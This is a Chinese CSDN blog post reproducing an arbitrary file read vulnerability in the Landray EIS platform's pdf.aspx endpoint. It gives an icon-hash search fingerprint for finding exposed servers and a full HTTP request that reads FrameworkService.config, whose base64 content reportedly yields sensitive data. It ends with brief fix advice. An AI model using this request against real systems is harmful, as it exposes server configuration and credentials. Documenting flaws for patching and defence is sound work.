蓝凌EIS pdf.aspx 任意文件读取漏洞

最新推荐文章于 2024-05-23 13:55:07 发布
最新推荐文章于 2024-05-23 13:55:07 发布
阅读量748 收藏 9
点赞数 11
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36618918/article/details/135507610
版权

漏洞描述:

蓝凌EIS智慧协同平台是一个简单、高效的工作方式专为成长型企业打造的沟通、协同、社交的移动办公平台,覆盖OA、沟通、客户、人事、知识等管理需求,集合了非常丰富的模块,满足组织企业在知识、项目管理系统建设等需求的一款OA系统。

漏洞描述

蓝凌EIS智慧协同平台pdf.aspx文件存在任意文件读取漏洞。攻击者可通过该漏洞在服务器端读取任意文件敏感内容,可能导致攻击者后续获取到相关的服务器权限。

资产测绘

icon_hash=“953405444”
在这里插入图片描述

漏洞复现

GET /EIS/service/pdf.aspx?path=/FrameworkService.config HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Upgrade-Insecure-Requests: 1

在这里插入图片描述
将密文base64解码得到明文,获取敏感信息数据
在这里插入图片描述

修复建议

1、升级至最新安全版本。
2、限制接口访问。

keepb1ue
关注
  • 11
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
蓝凌OA custom.jsp 任意文件读取漏洞批量扫描脚本.py
08-28
自己写的批量扫描脚本,很好用,可以借鉴一下
蓝凌EIS智慧协同平台 fl_define_flow_chart_show.aspx 存在 SQL注入漏洞
3tefanie丶zhou的博客
01-10 448
蓝凌EIS智慧协同平台是一款专为企业提供高效协同办公和团队合作的产品。该平台集成了各种协同工具和功能,旨在提升企业内部沟通、协作和信息共享的效率。由于蓝凌EIS智慧协同平台 fl_define_flow_chart_show.aspx接口处未对用户输入的SQL语句进行过滤或验证导致出现SQL注入漏洞,未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。
漏洞复现--蓝凌EIS智慧协同平台任意文件上传
qq_53003652的博客
10-20 533
蓝凌EIS蓝凌18年中大客户办公应用与阿里钉钉相融合的一款功能全、体验好、开通即用、配置灵活、软硬一体的租赁版OA系统。该系统saveImg存在任意文件上传。可更改后缀上传免杀脚本木马获取服务器权限。
蓝凌(Landray)OA漏洞常见RCE
A_991128a的博客
03-08 1370
背景是由于一次和友商共同的渗透项目测试中,其中一个系统使用了蓝凌OA,但当时由于一些原因觉得版本挺新应该是打了补丁的故在测试中没有仔细遍历复现蓝凌OA的历史常见RCE漏洞,后续对比了友商的报告发现别人测的两个RCE,故统一做个poc积累学习,混个眼熟防止下次渗透或攻防时漏掉。
漏洞复现】蓝凌EIS智慧协同平台-pdf-文件读取
知黑而守白
01-15 42
蓝凌EIS智慧协同平台是个自动化办公OA,具有多端同步、无缝协作,提供移动端(蓝凌KK、阿里钉钉、微信企业号)、桌面端、网页端多端应用统一入口、跨屏操作、信息同步知识云服务集成、学习与创新应用、企业2.0应用、跨系统整合等优点,并且在诸多公司也采用该平台。蓝凌EIS智慧协同平台 pdf.aspx 接口存在任意文件读取漏洞。攻击者可以通过构造特殊的请求连接,利用该漏洞获取系统敏感文件
蓝凌EIS4.0白皮书
12-13
蓝凌EIS4.0白皮书,知识管理专家,让工作更智慧
蓝凌标准产品V16.0管理员手册-admin.do配置.pdf
05-25
蓝凌标准产品V16.0管理员手册-admin.do配置.pdf
蓝凌-协同办公解决方案介绍.pdf
07-08
蓝凌-协同办公解决方案介绍.pdf
蓝凌专业知识管理平台(KMS).pdf
05-25
蓝凌专业知识管理平台(KMS).pdf
.faust勒索病毒解密方法|勒索病毒解决|勒索病毒恢复|数据库修复
huifu91的博客
05-21 901
这些勒索病毒往往攻击入侵的目标基本是Windows系统的服务器,包括一些市面上常见的业务应用软件,例如:金蝶软件数据库,用友软件数据库,管家婆软件数据库,速达软件数据库,科脉软件数据库,海典软件数据库,思迅软件数据库,OA软件数据库,ERP软件数据库,自建网站的数据库等,均是其攻击加密的常见目标文件,所以有以上这些业务应用软件的服务器更应该注意做好服务器安全加固及数据备份工作。经过对病毒样本的深入分析和对XX公司网络环境的全面检查,91数据恢复公司的专家们很快找到了病毒的入侵路径和加密机制。
软考高级架构师:软件系统安全相关概念完整性、不可否认性、可控性、机密性、安全审计
明明如月的技术博客
05-19 246
了解软件系统安全的几个重要概念:完整性、不可否认性、可控性、机密性和安全审计,可以通过一些日常生活中的例子来帮助理解。
[图解]SysML和EA建模住宅安全系统-05
rolt的专栏
05-18 736
作用就是定义属性之间的数学关系
保障餐饮场所安全:可燃气体报警器专业检测的必要性
BDjiance的博客
05-21 157
可燃气体报警器是一种用于监测空气中可燃气体浓度的设备,一旦检测到可燃气体浓度超过设定的安全范围,就会发出警报,提醒人们及时采取措施,避免火灾事故的发生。在日常经营中,餐饮场所也应当加强对可燃气体报警器的日常维护和保养,定期清洁和检查,确保其在平时的使用中处于良好的状态。其次,定期检测也可以校准报警器的灵敏度,确保其能够及时、准确地检测到可燃气体的泄漏情况,提供更可靠的安全保障。综上所述,餐饮场所应当认真对待可燃气体报警器的专业检测周期,选择正规的专业机构进行检测和校准,保障其安全可靠。
[图解]SysML和EA建模住宅安全系统-07 to be块定义图
rolt的专栏
05-21 931
然后再针对这个画一个块内部图,然后这里再把签名拖上去
HLS视频加密,让您的视频内容更安全!
云存储小天使的博客
05-21 713
HLS视频加密是一种基于HTTP Live Streaming(HLS)协议的加密技术。它的核心思想是将视频切片进行加密处理,在客户端播放时需要先获取解密密钥才能正常偶发。通过这种方式,HLS加密可以有效防止未经授权的第三方窃取视频内容,从而保障了视频内容的版权和安全。数据万象媒体处理服务提供了一套HLS视频加密方案,方便用户各个场景的需求。
雷电预警监控系统:守护安全的重要防线
最新发布
thhj3312的博客
05-23 308
雷电预警监控系统广泛应用于油库罐区、石油化工、机场、工业园区等重要设施。这些地方对安全要求极高,一旦遭遇雷击,可能引发严重的安全事故,造成巨大的财产损失。雷电预警监控系统能够在雷电来临前提前报警,为相关人员提供充足的时间采取预防措施,有效避免雷击带来的损失。雷电预警监控系统的核心在于其先进的监测和预警技术。一旦系统检测到雷电活动即将发生或已经发生,便会立即触发预警机制,向相关人员发出警报,以便及时采取防护措施。为了有效应对雷电带来的威胁,雷电预警监控系统应运而生,成为现代社会中不可或缺的安全防护工具。
大坝安全位测设备:位移监测站
thhj3312的博客
05-20 788
TH-WY1大坝安全位移监测设备是用于监测水库大坝位移变化的设备,旨在确保大坝的安全运行。总的来说,大坝安全位移监测设备是大坝安全管理的重要组成部分,通过实时、准确的监测数据,可以确保大坝的安全运行,减少潜在的安全风险。
Web应用防火墙的重要性
XRY_XIAO的博客
05-20 573
Web应用防火墙的重要性
蓝凌oa漏洞检测工具
07-28
很抱歉,我无法提供关于蓝凌OA漏洞检测工具的信息。 #### 引用[.reference_title] - *1* [蓝凌(Landray)OA漏洞常见RCE](https://blog.csdn.net/qq_53385700/article/details/128650811)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [蓝凌OA前台任意文件读取漏洞利用](https://blog.csdn.net/wangxueying5172/article/details/119429287)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值